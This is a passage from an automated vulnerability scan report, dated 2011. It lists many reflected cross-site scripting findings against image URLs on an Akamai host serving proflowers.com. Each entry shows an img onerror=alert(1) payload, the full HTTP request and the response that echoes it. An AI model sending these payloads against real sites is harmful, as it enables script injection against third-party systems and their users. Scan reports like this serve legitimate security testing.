Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQmixedvdaycurly10_PFd7a61<img src=a onerror=alert(1)>2d0b0eab967
1.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5539<img%20src%3da%20onerror%3dalert(1)>cbd1b68987b was submitted in the REST URL parameter 9. This input was echoed as b5539<img src=a onerror=alert(1)>cbd1b68987b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PFb5539<img%20src%3da%20onerror%3dalert(1)>cbd1b68987b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQnewvdaybqt11_PFb5539<img src=a onerror=alert(1)>cbd1b68987b
1.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f2637<img%20src%3da%20onerror%3dalert(1)>a8c2691e770 was submitted in the REST URL parameter 9. This input was echoed as f2637<img src=a onerror=alert(1)>a8c2691e770 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PFf2637<img%20src%3da%20onerror%3dalert(1)>a8c2691e770?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQrosesalstro_dmsk11_PFf2637<img src=a onerror=alert(1)>a8c2691e770
1.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 10a2c<img%20src%3da%20onerror%3dalert(1)>2c86fed5b29 was submitted in the REST URL parameter 9. This input was echoed as 10a2c<img src=a onerror=alert(1)>2c86fed5b29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF10a2c<img%20src%3da%20onerror%3dalert(1)>2c86fed5b29?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/MBQshowersflowers_dmsk11_PF10a2c<img src=a onerror=alert(1)>2c86fed5b29
1.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6a5cf<img%20src%3da%20onerror%3dalert(1)>3e463c184e7 was submitted in the REST URL parameter 9. This input was echoed as 6a5cf<img src=a onerror=alert(1)>3e463c184e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF6a5cf<img%20src%3da%20onerror%3dalert(1)>3e463c184e7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQtruspec11_PF6a5cf<img src=a onerror=alert(1)>3e463c184e7
1.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b56c4<img%20src%3da%20onerror%3dalert(1)>17d73dc25f3 was submitted in the REST URL parameter 9. This input was echoed as b56c4<img src=a onerror=alert(1)>17d73dc25f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PFb56c4<img%20src%3da%20onerror%3dalert(1)>17d73dc25f3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQvdaytulipfreesia10_PFb56c4<img src=a onerror=alert(1)>17d73dc25f3
1.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ab17a<img%20src%3da%20onerror%3dalert(1)>cf29162016c was submitted in the REST URL parameter 9. This input was echoed as ab17a<img src=a onerror=alert(1)>cf29162016c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PFab17a<img%20src%3da%20onerror%3dalert(1)>cf29162016c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PFab17a<img src=a onerror=alert(1)>cf29162016c
1.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload db227<img%20src%3da%20onerror%3dalert(1)>38f92df87c2 was submitted in the REST URL parameter 9. This input was echoed as db227<img src=a onerror=alert(1)>38f92df87c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PFdb227<img%20src%3da%20onerror%3dalert(1)>38f92df87c2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PFdb227<img src=a onerror=alert(1)>38f92df87c2
1.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2d1b8<img%20src%3da%20onerror%3dalert(1)>9b08ddae393 was submitted in the REST URL parameter 9. This input was echoed as 2d1b8<img src=a onerror=alert(1)>9b08ddae393 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF2d1b8<img%20src%3da%20onerror%3dalert(1)>9b08ddae393?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 122
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF2d1b8<img src=a onerror=alert(1)>9b08ddae393
1.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e5fa6<img%20src%3da%20onerror%3dalert(1)>a43e173e065 was submitted in the REST URL parameter 9. This input was echoed as e5fa6<img src=a onerror=alert(1)>a43e173e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PFe5fa6<img%20src%3da%20onerror%3dalert(1)>a43e173e065?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PFe5fa6<img src=a onerror=alert(1)>a43e173e065
1.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3768b<img%20src%3da%20onerror%3dalert(1)>550117928d0 was submitted in the REST URL parameter 9. This input was echoed as 3768b<img src=a onerror=alert(1)>550117928d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF3768b<img%20src%3da%20onerror%3dalert(1)>550117928d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12assrt50_rbye11_PF3768b<img src=a onerror=alert(1)>550117928d0
1.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b57ec<img%20src%3da%20onerror%3dalert(1)>8ac26b53db2 was submitted in the REST URL parameter 9. This input was echoed as b57ec<img src=a onerror=alert(1)>8ac26b53db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PFb57ec<img%20src%3da%20onerror%3dalert(1)>8ac26b53db2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:52 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12assrt_gv10_PFb57ec<img src=a onerror=alert(1)>8ac26b53db2
1.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2a5a2<img%20src%3da%20onerror%3dalert(1)>220f35153ea was submitted in the REST URL parameter 9. This input was echoed as 2a5a2<img src=a onerror=alert(1)>220f35153ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF2a5a2<img%20src%3da%20onerror%3dalert(1)>220f35153ea?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12pink50_gv11_PF2a5a2<img src=a onerror=alert(1)>220f35153ea
1.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 80316<img%20src%3da%20onerror%3dalert(1)>5b91b361cb9 was submitted in the REST URL parameter 9. This input was echoed as 80316<img src=a onerror=alert(1)>5b91b361cb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF80316<img%20src%3da%20onerror%3dalert(1)>5b91b361cb9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:50 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red40_rbye11_3_FV_PF80316<img src=a onerror=alert(1)>5b91b361cb9
1.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c0749<img%20src%3da%20onerror%3dalert(1)>3cf25d69d4b was submitted in the REST URL parameter 9. This input was echoed as c0749<img src=a onerror=alert(1)>3cf25d69d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PFc0749<img%20src%3da%20onerror%3dalert(1)>3cf25d69d4b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red50_rbye11_FV_PFc0749<img src=a onerror=alert(1)>3cf25d69d4b
1.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 65b0f<img%20src%3da%20onerror%3dalert(1)>a549e23adca was submitted in the REST URL parameter 9. This input was echoed as 65b0f<img src=a onerror=alert(1)>a549e23adca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

